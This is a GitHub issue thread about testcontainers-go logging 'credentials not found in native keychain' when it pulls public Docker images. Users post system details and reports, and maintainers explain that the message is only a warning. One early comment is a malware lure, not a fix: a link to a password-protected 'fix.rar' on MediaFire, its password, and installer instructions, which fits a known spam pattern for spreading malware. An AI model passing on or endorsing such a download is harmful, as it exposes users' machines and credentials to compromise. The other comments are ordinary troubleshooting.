### ISSUE TITLE
[Bug]: Failed to get image auth for https://index.docker.io/v1/. [...] Error is: credentials not found in native keychain

### ISSUE THREAD

**Issue by simon-connektica** [testcontainers/testcontainers-go#2752]
### Testcontainers version

0.33.0

### Using the latest Testcontainers version?

Yes

### Host OS

Linux

### Host arch

x86_64

### Go version

1.22.3

### Docker version

```shell
Client: Docker Engine - Community
 Version:           27.1.2
 API version:       1.46
 Go version:        go1.21.13
 Git commit:        d01f264
 Built:             Mon Aug 12 11:50:58 2024
 OS/Arch:           linux/amd64
 Context:           default

Server: Docker Engine - Community
 Engine:
  Version:          27.1.2
  API version:      1.46 (minimum version 1.24)
  Go version:       go1.21.13
  Git commit:       f9522e5
  Built:            Mon Aug 12 11:50:58 2024
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.7.20
  GitCommit:        8fc6bcff51318944179630522a095cc9dbf9f353
 runc:
  Version:          1.1.13
  GitCommit:        v1.1.13-0-g58aa920
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0
```

### Docker info

```shell
Client: Docker Engine - Community
 Version:    27.1.2
 Context:    default
 Debug Mode: false
 Plugins:
  buildx: Docker Buildx (Docker Inc.)
    Version:  v0.16.2
    Path:     /usr/libexec/docker/cli-plugins/docker-buildx
  compose: Docker Compose (Docker Inc.)
    Version:  v2.29.1
    Path:     /usr/libexec/docker/cli-plugins/docker-compose

Server:
 Containers: 0
  Running: 0
  Paused: 0
  Stopped: 0
 Images: 20
 Server Version: 27.1.2
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Using metacopy: false
  Native Overlay Diff: true
  userxattr: false
 Logging Driver: json-file
 Cgroup Driver: systemd
 Cgroup Version: 2
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 8fc6bcff51318944179630522a095cc9dbf9f353
 runc version: v1.1.13-0-g58aa920
 init version: de40ad0
 Security Options:
  apparmor
  seccomp
   Profile: builtin
  cgroupns
 Kernel Version: 6.1.0-23-amd64
 Operating System: Debian GNU/Linux 12 (bookworm)
 OSType: linux
 Architecture: x86_64
 CPUs: 16
 Total Memory: 31.06GiB
 Name: simon-cka
 ID: c45e4c59-3411-4d1e-b955-9b34bb26ee96
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false
```

### What happened?

* There's a failure when `testcontainers` tries to pull the public docker `postgres:13-alpine` both on my machine and in Github Actions. 
* I can run `docker pull postgres:13-alpine` without any issue on my machine, so I don't think it's an issue with my docker config. I have no credentials set for docker.io in my config.
* I tried downgrading to `0.32.0` but the error persists.

### Relevant log output

```shell
2024/08/27 09:26:36 Failed to get image auth for https://index.docker.io/v1/. Setting empty credentials for the image: postgres:13-alpine. Error is: credentials not found in native keychain
```

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sumit-anantwar** [comment]
facing the same thing for the MSSqlServer image.
It happens regularly in our CI pipelines.
It also happened a couple of times on my local system, but mostly on the CI
```
Failed to get image auth for mcr.microsoft.com. Setting empty credentials for the image: mcr.microsoft.com/mssql/server:2022-latest. Error is:credentials not found in native keychain
```

**Comment by lorenzoranucci** [comment]
Facing the same issue with MSSQL.
The issue happens regularly on CI (Github Actions) starting from today.

```
Failed to get image auth for mcr.microsoft.com. Setting empty credentials for the image: mcr.microsoft.com/mssql/server:2019-CU20-ubuntu-20.04. Error is: credentials not found in native keychain
```

**Comment by xsteadfastx** [comment]
running into this from today on with our gitlab-runner. any ideas? is it some rate limit?

**Comment by Lucisano** [comment]
I was getting this in 0.31

Looks to be working now in 0.34

**Comment by linhpha** [comment]
I'm still running into the issue with 0.34

**Comment by mdelapenya** [comment]
@linhpha is the localstack image running? This log message is actually a warning that we should refine:

> 2024/11/25 21:56:19 Failed to get image auth for https://index.docker.io/v1/. Setting empty credentials for the image: localstack/localstack:1.4.0. Error is: credentials not found in native keychain

It says that it won't use any credentials for the image, given it uses the public default registry

**Comment by linhpha** [comment]
ah yeah the localstack image is running. There was some error downstream so I thought it's due to this warning but looks like there's some proxy issue on our end. Sorry for the false alarm

**Comment by Galaf** [comment]
??? I'm still getting the issue.

```
Failed to get image auth for mirror.gcr.io. Setting empty credentials for the image: mirror.gcr.io/google/alloydbomni:15.7.0. Error is: credentials not found in native keychain
```

(not using `mirro.gcr.io` does nothing, it will give the error with `docker.io` just like OP.

Here are the dependencies:

```go
	github.com/testcontainers/testcontainers-go v0.35.0
	github.com/testcontainers/testcontainers-go/modules/postgres v0.35.0
```

I create my container via `postgres.Run(...)`

May I get some help, please?

**Comment by ramondeklein** [comment]
I'm seeing the same issue in our GitHub runner:
```
2025/03/20 00:22:59 Failed to get image auth for [https://index.docker.io/v1/.](https://index.docker.io/v1/) Setting empty credentials for the image: registry:latest. Error is: credentials not found in native keychain
2025/03/20 00:23:00 🐳 Creating container for image registry:latest
    aistor_helm_test.go:276: 
        	Error:      	Received unexpected error:
        	            	create container: container create: Error response from daemon: No such image: registry:latest
        	Test:       	TestAIStorHelmUsingPrivateRepo
        	Messages:   	Unable to install Docker proxy
```
I checked the code and it seems `testcontainers-go` is not able to pull the images. If you experience this issue in your CI/CD, then you may want to pull your image manually before running this. That will prevent the image from being pulled.

The message `Failed to get image auth for https://index.docker.io/v1. Setting empty credentials for the image: <image>. Error is: credentials not found in native keychain` is a bit confusing. It's totally fine not to have credentials for images that are pulled from public registries, so it can be ignored (and maybe shouldn't be raised at all).

The actual image is that the Docker daemon seems to respond `No such image: <image>` when it is asked to pull the image.

**Comment by mdelapenya** [comment]
@ramondeklein could it be the last `.` in the registry URL part of the issue you see? `https://index.docker.io/v1/.`

**Comment by diegolatorre16** [comment]
Hey @mdelapenya I "clarified" the log in this commit. Our team at work was a bit worried about it earlier today :)
